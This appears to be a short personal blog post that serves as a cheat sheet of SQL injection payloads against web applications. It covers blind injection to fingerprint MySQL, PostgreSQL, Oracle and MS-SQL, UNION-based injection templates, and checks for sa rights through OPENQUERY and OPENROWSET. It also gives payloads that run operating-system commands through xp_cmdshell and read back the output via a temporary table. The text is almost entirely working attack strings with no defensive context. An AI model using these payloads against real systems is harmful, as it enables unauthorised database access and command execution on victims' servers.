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Its the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!


SQL injection and identification

Identify sql Server through Blind SQL injection*!40017%20s*/

MySQL is at least 4.0.17 if you get a different result.

## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access

Normal Union attack
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--


Check if we are admins

Check things like
(select 1 from OPENQUERY([$servername],'select 1'))

(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))

If we have a linked server and sa
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

If already sa
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')

Other things todo
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

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